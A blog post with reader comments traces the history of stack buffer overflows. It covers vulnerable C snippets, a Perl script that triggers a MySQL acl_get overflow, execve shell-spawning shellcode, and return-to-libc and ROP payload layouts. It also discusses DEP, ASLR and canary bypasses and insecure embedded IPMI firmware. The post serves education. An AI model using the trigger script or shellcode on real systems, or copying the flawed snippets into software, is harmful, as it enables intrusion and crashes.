Are buffer-overflows solved yet? A historical tale.

Perhaps the most exciting, scary, and classic security vulnerability is the stack-based buffer overflow. This class of vulnerability goes as far back as the 1970s and its legendary status can be tied to C and Unix itself. One of the first computer worms, Morris, exploited exactly this flaw. In the late 1980s, overflows burst onto the national stage to become a leading security concern. In 1996, one of the most classic and most cited gray-hat security texts was published; entitled Smashing the Stack for Fun and Profit (PDF), Aleph One describes the attack in gory-detail and gives a full step-by-step guide on writing an exploit. These days, this text is required reading for security students and professionals alike. Indeed, the buffer-overflow has been so important that countless security research papers have been written about it attempting to “fix” the problem; this area has almost been completely beat to death by the research community. Despite this, papers are still being written and published today!

So, after a few decades of existence, can we finally put this behind us? Is the overflow defeated yet? It turns out, this answer is not straight-forward. The buffer-overflow is a particularly nasty beast, and despite our best efforts it can still rear its ugly head. The problems can be surprisingly subtle, so to answer our question, we must understand these complications.

For those living under a rock for the past 40 years, here is the obligatory buffer-overflow example:

void main(void) {
    char buffer[256];
    scanf("%s", buffer); /* read arbitrarily sized string from stdin */
}

In this example, scanf will read any string from the input until a NULL byte is reached. Not enough room in the buffer? …no worries, just keep going! There’s nothing important after the 256 bytes, right?

And its not just scanf(), but a huge list of standard C functions that will overrun a buffer in complete silence!

OK, this was an easy one – surely a professional C programmer would be informed and avoid writing buffer overflows. Not quite. The following snippet is from a piece of software you probably indirectly use every day; see if you can spot the problem, it might not be immediately obvious:

/*
  Get privilege for a host, user and db combination

  as db_is_pattern changes the semantics of comparison,
  acl_cache is not used if db_is_pattern is set.
*/

ulong acl_get(const char *host, const char *ip,
              const char *user, const char *db, my_bool db_is_pattern)
{
  ulong host_access= ~(ulong)0, db_access= 0;
  uint i;
  size_t key_length;
  char key[ACL_KEY_LENGTH],*tmp_db,*end;
  acl_entry *entry;
  DBUG_ENTER("acl_get");

  printf("Entered acl_get - len(db): '%d': key_size: %d\n",
strlen(db), sizeof(key));

  mysql_mutex_lock(&acl_cache->lock);
  end=strmov((tmp_db=strmov(strmov(key, ip ? ip : "")+1,user)+1),db);

  if (lower_case_table_names)
  {
    my_casedn_str(files_charset_info, tmp_db);
    db=tmp_db;
  }
  key_length= (size_t) (end-key);
  if (!db_is_pattern && (entry=(acl_entry*) acl_cache->search((uchar*) key,
                                                              key_length)))
  {
    db_access=entry->access;
    mysql_mutex_unlock(&acl_cache->lock);
    DBUG_PRINT("exit", ("access: 0x%lx", db_access));
    DBUG_RETURN(db_access);
  }

The overflow occurs in the following code:

end=strmov((tmp_db=strmov(strmov(key, ip ? ip : "")+1,user)+1),db);

The following Perl script tickles the overflow with a SQL query (borrowed from here):

  use strict;
  use DBI();

  # Connect to the database.
  my $dbh = DBI->connect("DBI:mysql:database=test;host=192.168.2.3;",
                         "user", "secret",
                         {'RaiseError' => 1});

  $a ="A" x 100000;
  my $sth = $dbh->prepare("grant file on $a.* to 'user'\@'%' identified by 'secret';");
  $sth->execute();

  # Disconnect from the database.
  $dbh->disconnect();

This overflow hails for the MySQL source code and the flaw was reported in December 2012! This overflow happens extremely deep in the call tree, long after the input validation is done and a rare and specially-crafted query is needed for the code to be executed. Now, the MySql developers are certainly smart people, yet here is an overflow. How does this happen? Well, what 40 years of overflows have taught us is this: its incredibly hard not to write code with buffer overflows!

To drive this point home, here is another example:

char* processNext(char* strm) {
	 char buf[512];
	 short len = *(short*) strm;
	 strm += sizeof(len);
	 if (len <= 512) {
	  memcpy(buf, strm, len);
	  process(buf);
	  return strm + len;
	 } else {
	  return -1;
	 }
	}

This looks like a completely innocent piece of code. The code is doing length checks and returning -1 when the source buffer is too big. What could go wrong? The answer: negative numbers. If len contains a negative number the memcpy will proceed, and will convert len from a short to a size_t, which will now be interpreted as a large positive number; and, more importantly, a buffer overflow! There is a whole class of integer-related problems that result in overflows and like this example, they typically appear completely innocent. Even an experienced C programmer is likely to write them on occasion!

But hey, it’s 2013, surely we’ve solved this problem in some automatic defenses that can detect overflows and kill programs that have hurdled out-of-control. Yes, we have and they are quite good, but unfortunately they’re not perfect.

To understand how the current defenses work, we need to have a solid understanding of how a buffer-overflow attack can be designed. The memory layout of a fictitious buffer overflow — similair to the first example — looks something like this:

shell code layout cropped

During the overflow, the memory overwrite starts at the beginning of buffer and proceeds until the NULL byte is reached (assuming a string copy). If the input is longer than the buffer, the data at higher addresses will be overwritten. Most importantly for the attacker, the return address will be overwritten. Controlling the return address allows the attacker to make the program jump to any place in memory when the function attempts to return. This is how an attacker gains control.

The classic approach — the Aleph One era — is to inject some valid x86 machine code and set the return address to jump to it. The injected machine code typically makes a system call to spawn a shell, thus we commonly call it shellcode.

Here’s an example of shellcode in C:

#include <stdio.h>

void main() {
   char *name[2];

   name[0] = "/bin/sh";
   name[1] = NULL;
   execve(name[0], name, NULL);
}

Now, an attacker would compile this code, extract the raw binary machine code, and construct an input formatted like this (memory grows down):

<garbage to fill buffer and locals><return address: where shell code will be><shellcode>

And voilà you have successfully gained control of some machine! Except, it’s not 1996 anymore…

One of the first defenses to emerge is known as Data Execution Prevention (DEP) or W xor X. This defense stipulates that there will never be two regions of memory that can be both written to and executed from. Now, the process will crash if the CPU attempts to fetch an instruction from the Stack or the Heap. This defense is based on the observation that the attacker is injecting data, not code. Since, the attacker will only be injecting data, he should never be able to gain control of the program, right? Well, not exactly.

As it turns out, this code/data duality that is fundamental to Von Neumann machines is a tricky beast. What is Data? What is Code? These seemingly simple questions are actually so difficult that we still don’t have a proper answer. To quote Sergey Bratus et. al. — whom recently showed that the Intel MMU is itself turing-complete — Any sufficiently complex input is indistinguishable from code. Today, we’ve simply accepted that there really is no distinction.

Thus, it wasn’t long before attackers discovered a work-around to exploit buffer overflows: Return-Oriented Programming (ROP). Instead of directly providing the code to execute, an attacker can simply chain return jumps together and reuse existing code. The usual target of this ROP-business: The C Library (libc).

Perhaps the most obvious target is the system() function, which can be used to execute any shell command the attacker desires. This simple ROP exploit might look like this:

<garbage to fill buffer and locals>
<return address: address of system()>
<next return address (for system()): usually just garbage>
<argument 1 to system(): pointer to command string>
<command string>

However, more sophisticated ROP code can be constructed. The returns can be chained, resulting in something of this form:

<garbage to fill buffer and locals>
<1st return address: address of foo()>
<2nd return address: some “gadget” to pop the arguments from the last “call”>
<argument 1 to foo()>
<argument 2 to foo()>

<argument n to foo()>
<3rd return address: address of bar()>
<4th return address: some “gadget” to pop the arguments from the last “call”>
<argument 1 to bar()>
<argument 2 to bar()>

<argument n to bar()>

Things get a bit trickier on ARM and x86-64 machines since arguments are passed in registers, but its still do able. Hint: we’re in assembly land, so we can jump into the middle of a random function if we want!

Now, its easy to think that this technique is strictly less computationally powerful (from a theoretical sense) than injecting pure machine code. However, it turns out that ROP is turing-complete! This means we could write a compiler for <your-favorite-language-here> that would execute your code with only chained returns! (somebody please do this). This is the reality of the code/data duality.

To mitigate this threat, Address Space Layout Randomization (ASLR) emerged. This technique involves the Operating System memory management to randomize the memory mappings of stack, heap, and dynamic libraries (DLLs in Windows, Shared Object in Unix). Its no longer easy to jump to any piece of code in the execuatable, because the locations vary across executions. Sounds great, right?

Well, there are problems. First, if the code (.text) segment isn’t randomized — as the case in Linux — the attacker can call any libc function used by the program by jumping into the Procedure Linkage Table (PLT). The PLT is a table that maps into the randomized segments, so they can be called from deterministic addresses — kind of defeating the point. Luckily, only the dynamic library procedures used will be placed in the PLT, so if your code doesn’t call system() it will not be in the PLT. Second, on a 32-bit system, ASLR is almost worthless. On x86 32-bit machines, the page size is 4Kb — the lower 12-bits of the address. In addition, a handful of other bits (about 8 bits) are reserved for special regions. This leaves about 12-bits for randomization or a mere 4096 possibilities. This is very easy to brute-force.

Another ambitious and effective defense appeared at approximately the same time: StackGuard (or Stack Canaries). The name “stack canaries” is a reference to practice of using a “canary in a coal mine” to determine if Carbon-monoxide is present. This defense works in a similar way by placing a random or null value in the stack before the return address. If an array is overflowed, the canary value will be corrupted. Now, the program can simply check for the corruption before attempting a return. The stack format with stack canaries might look like this:

<256 char exploitable buffer>
<local vars>
<canary value>
<return address>
<function argument 1>
<function argument 2>

<function argument N>

The stack canary defense is among the hardest to defeat, but It can be done. Consider this code where the stack canary value is 0 (this isn’t uncommon), and ASLR is not enabled:

// dest will always point to a buffer with at least 256 chars
void func(char *dest) {
  char buffer[256];
  char *src = &buffer[0];
  scanf("%s", src);
  strncpy(dest, src, 255);
  dest[255] = '\0';
}

The scanf() provides a buffer overflow, but the method to defeat StackGuard may not be as clear. To understand, imagine that the stack layout looks like this:

<char buffer[256]>
<char *src>
<stack canary>
<return address>
<char *dest>

With this layout, an attacker can overwrite both src and dest during the overflow. Thus, the remaining code may not do what the programmer intended. If the stack canary was a null byte, restoring is easy. The attacker simply changes dest such that &dest[255] points to the address of the stack canary. Then, the dest[255] = ‘\0′ will restore the stack canary.

Now, with all three of these defenses (DEP, ASLR, & StackGuard), a successful attack can be incredibly difficult. So, lets return to our original question: Are buffer-overflows a solved problem now? The answer is still not clear… On a modern PC with all these defenses, one could argue that the problem is mitigated, but I want to consider the much broader application. In 2013, the computing landscape is wider than ever before. There is now an emerging class of devices that are challenging the status-quo: Embedded Systems; here lies the problem.

In the 1990s and 2000s we witnessed an outbreak of security problems with PCs as they were connected to the internet for the first time. In the 2010s, its the embedded world that is being increasingly  connected, and sadly the results are reminiscent of the past. There are countless recent blatant vulnerabilities in this class of devices, including GoPro Cameras, Internet Routers, CarsRemote Server Management Hardware (IPMI). But, our triplet defense should have solved this! Also, we have many wonderful new systems languages that do away with this issue (D, Go, Rust, etc). Why, is this still a problem?!

The problem is culture.

In recent work, myself and some colleagues reverse-engineered some firmware used on a remote management interface (IPMI). This class of device is used to remotely control servers, allowing the administrator to power-cycle the machine, install operating systems, and perform remote monitoring. What we discovered was appalling: there were trivial buffer overflows (like the first example) in the login page. Further, the only defense was an extremely limited form of ASLR. And, there were at least 40,000 such machines connected directly to the internet. The result was completely stunning.

After searching for answers, I stumbled upon this: embedded culture runs completely contrary to classical PC and server software development.  Many people have described the embedded industry as incredibly fast moving, leaving little time to do things the “right way”. They depict managers that urge developers to push their products out the door as-soon-as-humanly-possible. There’s an attitude that worrying about security is wasting ones time. Stunningly, I’ve even met firmware developers who’d never even heard of a buffer-overflow! They appeared genuinely shocked when I explained the concept.

The embedded world has long enjoyed the “coffee-pot domain” where applications have simple well-defined use-cases. Who cares if their coffee machine has buffer overflows? What could the attacker do, other than cause a big inconvenience (its not like we’re addicted to caffeine ;-) ). However, if an attacker uses an  embedded device to gain complete control of your server (or car), the potential damage is nearly immeasurable.

Today, embedded is the new threat, and many of these attacks are the result of some negligent buffer-overflow. While we have a fairly good handle on buffer-overflows from the technical side, we still struggle socially with the problem. Correcting this problem requires an industry culture shift and a lot of developer education.

However, writing good and secure code requires the ability to “think like an attacker” and have some background understanding of how software can be exploited and where the defenses can fail. In this post I have attempted to do just that, but my treatment has been only minimal. To really understand, you have to write your own buffer-overflow attack. Not only is it fun, but you never fully understand a problem, until you’ve had to solve it.

In future posts, I may begin a “Buffer-overflow Tutorial” series where I give a step-by-step exploit walk-through of real buffer-overflows (for example: the mysql overflow above!) Until then, happy hacking!

 

7 thoughts on “Are buffer-overflows solved yet? A historical tale.

    1. ajbonkoski@gmail.com Post author

      I’m not sure yet: I’m still considering the idea and the form. I’d even thought that a buffer-overflow challenge/competition site would be fun: think Project Euler style. Thanks for this link though, I’ll use it for inspiration.

      1. droope

        Heyya!

        I am a big fan of hackthissite.org, maybe you shoud consider cooperating with them instead of starting from scratch!

        Regards,
        Pedro

  1. Jeremiah Gowdy

    I think the real issue we need to get away from is the idea that the stack used for CALL is the same as the stack used for parameters (depending on the calling convention) and locals. If you split the two stacks, the technique doesn’t seem usable. With that you’d have the additional option of making the call stack read only except for CALL/RET and possibly a stack unwinding instruction for exceptions. The other option is what Itanium did with branch registers that overflow into a backing store. Obviously the branch register solution requires a different CPU architecture, but it would seem like you could implement split stacks by calling convention. It would probably create bad register pressure on x86 32bit, but with the extra registers of x64 it might be feasible. What are your thoughts?

    1. ajbonkoski@gmail.com Post author

      This is an interesting idea, that I’ve indeed had as well. It may work if implemented very carefully (there are a a LOT of corner cases). However, I’m not convinced that current architectures can support it with unreasonable performance overhead. For one, memory protections aren’t as fine grained as you propose, so a CALL/RET would likely need to cross an OS boundary. Otherwise, the split stack would be writable by any Store instruction, which still allows a specially-crafted overflow to modify the addresses. There are a lot of complications here, but it’d be interesting to see if future architectures implement some of these fine-grained memory protections.

Comments are closed.